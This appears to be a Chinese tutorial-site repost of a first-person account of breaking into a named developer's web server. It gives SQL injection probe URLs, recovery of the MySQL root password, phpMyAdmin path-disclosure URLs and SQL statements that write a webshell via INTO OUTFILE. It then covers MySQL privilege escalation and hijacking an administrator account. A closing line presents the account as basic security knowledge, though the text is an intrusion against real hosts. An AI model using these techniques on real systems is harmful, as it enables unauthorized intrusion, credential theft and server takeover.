明輝手游網(wǎng)中心:是一個(gè)免費(fèi)提供流行視頻軟件教程、在線學(xué)習(xí)分享的學(xué)習(xí)平臺(tái)!

看黑客是如何黑了落伍者的(圖)

[摘要]前天,聽說落伍分類信息程序發(fā)布了,就想前去看看,什么樣子的.一看,真不愧是落伍的產(chǎn)品,風(fēng)格依然落伍,功能還行,大體一看沒什么漏洞. 看看服務(wù)器吧.ping demo.im286.com返回IP 58.253.71.241打開是個(gè)"Directory Listing Denied"...

前天,聽說落伍分類信息程序發(fā)布了,就想前去看看,什么樣子的.一看,真不愧是落伍的產(chǎn)品,風(fēng)格依然落伍,功能還行,大體一看沒什么漏洞.
看看服務(wù)器吧.ping demo.im286.com返回IP 58.253.71.241打開是個(gè)"Directory Listing Denied",沒意思.不喜歡.
再看看開發(fā)者的站,www.php.com.cn,域名真不錯(cuò),ping一下吧.返回Pinging phper.xihuidc.com.cn [58.253.71.241],看出門道來了,CNAME啊.而且一看域名xihuidc,這個(gè)IDC有點(diǎn)2.CNAME的確便于管理,但是這樣不太 好.
ping的同時(shí)我也打開了php.com.cn的站點(diǎn),喲,"Powered by ebcms",先來檢測下注入吧.
http://www.php.com.cn/?do=index&cid=3'
http://www.php.com.cn/?do=news&id=4'
這兩個(gè)豬點(diǎn)不僅出錯(cuò)了,而且返回了物理地址.D:public_htmlphp.com.cnwwwrootlibrariessyslibdriversdriver.mysql.php(這個(gè)地址很重要哦)
本來想,有豬點(diǎn),射管理員密碼出來,進(jìn)后臺(tái)不就得了嗎,讀出密碼一看,傻眼了.crypt加密的,DZ那邊的數(shù)據(jù)也讀出來了.魚也夠BT的,密碼暴不出來,而且只登錄過一次...(這個(gè)也很重要,細(xì)節(jié).)
因?yàn)樵跈z測的時(shí)候發(fā)現(xiàn)是mysql的root,直接找工具pangolin,讀文件吧,怎么讀文件也是很有技巧的,這里不多說,讀到setting.php,終于讀到root的密碼了.
看黑客是如何黑了落伍者的(圖)1
現(xiàn)在就開始猜phpmyadmin的路徑了,這個(gè)倒是很順利.
http://phper.xihuidc.com.cn/phpmyadmin/,然后就很簡單了.暴路徑,暴路徑我給大家?guī)讉(gè)辦法:
引用
phpMyAdmin/libraries/select_lang.lib.php
phpMyAdmin/darkblue_orange/layout.inc.php
phpMyAdmin/index.php?lang[]=1
路徑出來了.E:phpMyadminphpmyadminlibrariesselect_lang.lib.php
看黑客是如何黑了落伍者的(圖)2
寫個(gè)shell進(jìn)去.
Create TABLE tmdsb(shell text NOT NULL);
Insert INTO tmdsb (shell) VALUES('test');
select shell from tmdsb into outfile 'E:phpMyadminphpmyadminlibrariesphp.php';
Drop TABLE tmdsb;
有個(gè)小馬就好辦了,再傳個(gè)大馬進(jìn)去.發(fā)現(xiàn)每個(gè)磁盤根目錄都不能瀏覽,甚至跳到D:public_htmlphp.com.cn wwwroot這里也跳不過去,只能在phpmyadmin的目錄溜達(dá),這里表揚(yáng)下IDC,做的不錯(cuò).看看C:Progra~1,沒有SERV- U,不能用Serv-U提權(quán)了,上傳一個(gè)su.php,由于MYSQL是以系統(tǒng)權(quán)限安裝的,(在WINDOWS服務(wù)管理里面可以看到,是以服務(wù)加載的)所 以,這里我考慮用MYSQL提權(quán),如圖:
(這個(gè)shell里的我給拼錯(cuò)了,select和cmdshell,直接導(dǎo)致我以為服務(wù)器net.exe做了限制...其實(shí)沒有...)
看黑客是如何黑了落伍者的(圖)3
看黑客是如何黑了落伍者的(圖)4
修改用戶k666.com的密碼,并添加到管理員組,成功登陸服務(wù)器.


上面是電腦上網(wǎng)安全的一些基礎(chǔ)常識(shí),學(xué)習(xí)了安全知識(shí),幾乎可以讓你免費(fèi)電腦中毒的煩擾。